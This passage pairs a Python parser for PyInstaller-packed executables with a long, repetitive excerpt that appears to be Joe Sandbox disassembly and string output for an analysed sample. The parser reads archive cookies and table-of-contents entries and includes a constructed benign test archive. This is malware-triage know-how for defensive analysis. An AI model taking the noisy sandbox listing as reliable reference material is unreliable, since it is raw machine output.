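the archive built by build_sample() is constructed, not taken from the sample.
"""
import struct
import zlib

COOKIE_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
# magic, package length, TOC offset, TOC length, python version, python DLL name
COOKIE_FMT = "!8sIIii64s"
COOKIE_SIZE = struct.calcsize(COOKIE_FMT)          # 88 bytes
# entry length, data offset, compressed length, uncompressed length, compressed flag, type code
TOC_FMT = "!iIIIBc"
TOC_FIXED = struct.calcsize(TOC_FMT)               # 18 bytes; the NUL-padded name follows

TYPE_CODES = {
    b"b": "binary", b"z": "PYZ archive", b"m": "module", b"s": "script",
    b"x": "data", b"o": "runtime option", b"d": "dependency", b"M": "package",
}


def parse_carchive(data):
    """Return cookie fields and TOC entries, or None if no PyInstaller cookie is present."""
    # Search from the end: the bootloader's .rdata also contains the magic constant,
    # the cookie itself is the last 88 bytes of the appended archive.
    cookie_pos = data.rfind(COOKIE_MAGIC)
    if cookie_pos < 0:
        return None
    _, pkg_len, toc_off, toc_len, pyvers, pylib = struct.unpack_from(COOKIE_FMT, data, cookie_pos)
    archive_start = cookie_pos + COOKIE_SIZE - pkg_len   # pkg_len covers data + TOC + cookie
    if archive_start < 0 or archive_start + toc_off + toc_len > len(data):
        raise ValueError("cookie fields do not fit the file")
    # Newer bootloaders store major*100+minor (312), older ones major*10+minor (37).
    major, minor = divmod(pyvers, 100) if pyvers >= 100 else divmod(pyvers, 10)
    entries = []
    toc = data[archive_start + toc_off : archive_start + toc_off + toc_len]
    off = 0
    while off < len(toc):
        entry_len, pos, clen, ulen, cflag, typ = struct.unpack_from(TOC_FMT, toc, off)
        if entry_len < TOC_FIXED or off + entry_len > len(toc):
            raise ValueError("malformed TOC entry")
        name = toc[off + TOC_FIXED : off + entry_len].rstrip(b"\x00").decode("utf-8", "replace")
        entries.append({"name": name, "pos": pos, "clen": clen, "ulen": ulen,
                        "compressed": bool(cflag), "type": TYPE_CODES.get(typ, typ.decode())})
        off += entry_len
    return {"archive_start": archive_start, "python": f"{major}.{minor}",
            "pylib": pylib.rstrip(b"\x00").decode(), "entries": entries}


def extract_entry(data, archive, entry):
    """Return an entry's uncompressed bytes, checking the TOC's declared length."""
    start = archive["archive_start"] + entry["pos"]
    blob = data[start : start + entry["clen"]]
    if entry["compressed"]:
        blob = zlib.decompress(blob)
    if len(blob) != entry["ulen"]:
        raise ValueError(f"{entry['name']}: got {len(blob)} bytes, TOC says {entry['ulen']}")
    return blob


def runtime_options(archive):
    """Names of 'o' entries; a pyi-runtime-tmpdir option is stored here as an entry name."""
    return [e["name"] for e in archive["entries"] if e["type"] == "runtime option"]


def build_sample():
    """Constructed stand-in for a packed PE: fake MZ prefix plus a minimal CArchive."""
    script = b"import os\nprint(os.environ['USERPROFILE'])\n"
    items = [  # (name, raw data, compress?, type code) -- all constructed values
        ("pyi-runtime-tmpdir %LOCALAPPDATA%\\Temp\\x", b"", False, b"o"),
        ("pyiboot01_bootstrap", b"# bootstrap\n", True, b"m"),
        ("blank", script, True, b"s"),
    ]
    body, toc = b"", b""
    for name, raw, compress, typ in items:
        data = zlib.compress(raw) if compress else raw
        name_b = name.encode() + b"\x00"
        entry_len = TOC_FIXED + len(name_b)
        toc += struct.pack(TOC_FMT, entry_len, len(body), len(data), len(raw), int(compress), typ) + name_b
        body += data
    pkg_len = len(body) + len(toc) + COOKIE_SIZE
    cookie = struct.pack(COOKIE_FMT, COOKIE_MAGIC, pkg_len, len(body), len(toc), 312, b"python312.dll")
    return b"MZ" + b"\x00" * 510 + body + toc + cookie


if __name__ == "__main__":
    sample = build_sample()
    arc = parse_carchive(sample)
    print(arc["pylib"], arc["python"], runtime_options(arc))
    for e in arc["entries"]:
        print(f"{e['type']:15} {e['name']:45} {e['ulen']:6d} bytes")
```

On a real sample, read the file into `data` and call `parse_carchive`; the 's' entries are the top-level scripts (marshalled code objects in recent PyInstaller versions, so they need the matching Python release to decompile), and the 'z' entry is the PYZ holding the imported modules. A pkg_len that does not fit the file, or a TOC entry whose inflated size disagrees with `ulen`, usually means tampering or a truncated download rather than a parser bug.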
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
• Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID: MoveWindow$ObjectSelect$DrawReleaseText
• String ID: P%
• API String ID: 2147705588-2959514604
• Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
• Instruction ID: 6b2b1fd78fbbcd4b6f597d47d0c8c13f53cc20c9b6f00f659d63b7c579709318
• Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
• Instruction Fuzzy Hash: 295128666087A186D6349F22E4185BAF7A1F798B61F504131EFDE43694EF3CD449CB20
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
• Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID: LongWindow$BlockCreateErrorLastReasonShutdown
• String ID: Needs to remove its temporary files.
• API String ID: 3975851968-2863640275
• Opcode ID: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
• Instruction ID: 5c1501fd4293f7a3c918412f29b879e5d6b3ba4b5e5a60b09422bc10f7a4dc6e
• Opcode Fuzzy Hash: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
• Instruction Fuzzy Hash: B5219C61B0CA4281E7456B79E854979E360FF84BA0FB84131DA6D837D4FE2CDD99C322
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
• Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: -$:$f$p$p
• API String ID: 3215553584-2013873522
• Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
• Instruction ID: 2f09ab37ec8a5d9d360f20b8152a4283d9ab92a0d30c295a8c4fbd3103b4be02
• Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
• Instruction Fuzzy Hash: E512A366A0C143C6FB247A95B104A79B699FB40750FFC4075E69B466C8FB3CED48CB22
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: f$f$p$p$f
• API String ID: 3215553584-1325933183
• Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
• Instruction ID: 5413a2a50a40f4f475792f6c517f06c74adb1407dca3f8da31ad62c384d1417e
• Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
• Instruction Fuzzy Hash: 2E128265E0C183C5FB60AAD5B054A79AA61FB40754FF84035E799475C4EB7CEC88CB22
Strings
Memory Dump Source
• Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
• API String ID: 2050909247-3659356012
• Opcode ID: 7e307792341f3e13bc35d069cd8d6eb008b40c51d7a157a29d78c9294da5d9b2
• Instruction ID: 339ad4c7bbc1447afa356fbb6427857611bda8e2c7b5b4302ebb97d41c84e9e5
• Opcode Fuzzy Hash: 7e307792341f3e13bc35d069cd8d6eb008b40c51d7a157a29d78c9294da5d9b2
• Instruction Fuzzy Hash: CE415E61A0C65281EA10FB91E800DB9E3A0BF45B84FF44431ED4D47795EF3CE949C762
Strings
Memory Dump Source
• Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
• API String ID: 2050909247-3659356012
• Opcode ID: 8171e7b2039391607633f9c15a315d45593e4c083ab96ebd05573d6ad0024e78
• Instruction ID: 8cbe3c5390da168785e7f66b97b79bb2c6dbf31273a18dd801e5468cb0ed9784
• Opcode Fuzzy Hash: 8171e7b2039391607633f9c15a315d45593e4c083ab96ebd05573d6ad0024e78
• Instruction Fuzzy Hash: C3417161A0C64285EA10EBA1E4409B9F3A0BF44B94FF44832ED5E47795FF7CE949C722
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
• Instruction ID: 4b03814a30b0cb6eb511c5bc79a26d75081a068ba495d1804a838b4fd879bc75
• Opcode Fuzzy Hash: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
• Instruction Fuzzy Hash: D0D1A03290C74186EB20ABA594417BDB7B0FB44798F700135EE4D97B96EF38E998C712
APIs
• GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF78DA53706,?,00007FF78DA53804), ref: 00007FF78DA52C9E
• FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF78DA53706,?,00007FF78DA53804), ref: 00007FF78DA52D63
• MessageBoxW.USER32 ref: 00007FF78DA52D99
Strings
Memory Dump Source
• Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
• Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                                        • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                                        • API String ID: 3940978338-251083826
                                                                                                                                                                                                                                        • Opcode ID: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                                                                                                                                                        • Instruction ID: f032ea65fe3066be7d1780dba8e08a0c7fac72c363dd072e12fc81f345e5c7c7
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9A31C96370C64142E620BB65B804ABBA6A5BF887D8FA04135DF4D93759FF3CD90AC711
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF78DA5DFEA,?,?,?,00007FF78DA5DCDC,?,?,?,00007FF78DA5D8D9), ref: 00007FF78DA5DDBD
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF78DA5DFEA,?,?,?,00007FF78DA5DCDC,?,?,?,00007FF78DA5D8D9), ref: 00007FF78DA5DDCB
                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF78DA5DFEA,?,?,?,00007FF78DA5DCDC,?,?,?,00007FF78DA5D8D9), ref: 00007FF78DA5DDF5
                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,00007FF78DA5DFEA,?,?,?,00007FF78DA5DCDC,?,?,?,00007FF78DA5D8D9), ref: 00007FF78DA5DE63
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF78DA5DFEA,?,?,?,00007FF78DA5DCDC,?,?,?,00007FF78DA5D8D9), ref: 00007FF78DA5DE6F
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                        • String ID: api-ms-
                                                                                                                                                                                                                                        • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                        • Opcode ID: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                                                                                                                                                        • Instruction ID: bd1efbf38f091a8b334d61de394ad97babc63a6ccb8261daaf0b93b224aed0a2
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 08317221B1E642D5EE12EB52A800975A3A4FF58BA0FF94535ED1D87380FF3CE859C225
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                        • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                        • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                        • Opcode ID: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
                                                                                                                                                                                                                                        • Instruction ID: 5c095a7f8edb46826f69add7f882c1d7a06fe95aeb58edee28593bcec0e75bdb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FA416021A0C68791EA11FB60E414AE9A335FB54344FF00132EA5D87696FF3CEA19C762
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF78DA5351A,?,00000000,00007FF78DA53F23), ref: 00007FF78DA52AA0
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                        • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                        • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                                        • Opcode ID: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                                                                                                                                                                                                        • Instruction ID: ade3b39e6dd314b315222d601eb3a598d108a925060bda253886a5704b20d8e8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EF21837261C78192E620AB51B841BE6A3A4FB887C4FA00131FE8D83659EF7CD949C751
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Value$ErrorLast
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2506987500-0
                                                                                                                                                                                                                                        • Opcode ID: 95e941e89c228e9c604249a81e4247bf93b8921c3316e711f137cef7aac77c3c
                                                                                                                                                                                                                                        • Instruction ID: cbb2f2b9afe6d498539cbfa3b5d5cce628e682acb9baf9ad2e5d582ad36f6b0f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 95e941e89c228e9c604249a81e4247bf93b8921c3316e711f137cef7aac77c3c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 51213C20E0D246C2FA587BB1665193EE1827F547A0FB44634D93E466D6FE2CEC49C323
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                        • String ID: CONOUT$
                                                                                                                                                                                                                                        • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                        • Opcode ID: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                                                                                                                                                                                                        • Instruction ID: 932e940a8bc74b9d8366c75af5f151f7cff9069e35c827afdcd25ff647f870ab
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F3118471B1CA4186E350AB52E854739A2A0FB88BE4F740234DD9D877A4EF3CDD08C751
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF78DA59216), ref: 00007FF78DA58592
                                                                                                                                                                                                                                        • K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF78DA59216), ref: 00007FF78DA585E9
                                                                                                                                                                                                                                          • Part of subcall function 00007FF78DA59400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF78DA545E4,00000000,00007FF78DA51985), ref: 00007FF78DA59439
                                                                                                                                                                                                                                        • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF78DA59216), ref: 00007FF78DA58678
                                                                                                                                                                                                                                        • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF78DA59216), ref: 00007FF78DA586E4
                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,00000000,00007FF78DA59216), ref: 00007FF78DA586F5
                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,00000000,00007FF78DA59216), ref: 00007FF78DA5870A
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3462794448-0
                                                                                                                                                                                                                                        • Opcode ID: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
                                                                                                                                                                                                                                        • Instruction ID: a4bfb56c5af357d41a21320795b8fefe1448f8cc05c531f7b99d497b9adb3d2c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5641A962B1D68241E630BB61A540AAAA3A4FB44BD4FB40135DF9D97B89FF3CD809C711
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF78DA64F81,?,?,?,?,00007FF78DA6A4FA,?,?,?,?,00007FF78DA671FF), ref: 00007FF78DA6B347
                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF78DA64F81,?,?,?,?,00007FF78DA6A4FA,?,?,?,?,00007FF78DA671FF), ref: 00007FF78DA6B37D
                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF78DA64F81,?,?,?,?,00007FF78DA6A4FA,?,?,?,?,00007FF78DA671FF), ref: 00007FF78DA6B3AA
                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF78DA64F81,?,?,?,?,00007FF78DA6A4FA,?,?,?,?,00007FF78DA671FF), ref: 00007FF78DA6B3BB
                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF78DA64F81,?,?,?,?,00007FF78DA6A4FA,?,?,?,?,00007FF78DA671FF), ref: 00007FF78DA6B3CC
                                                                                                                                                                                                                                        • SetLastError.KERNEL32(?,?,?,00007FF78DA64F81,?,?,?,?,00007FF78DA6A4FA,?,?,?,?,00007FF78DA671FF), ref: 00007FF78DA6B3E7
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
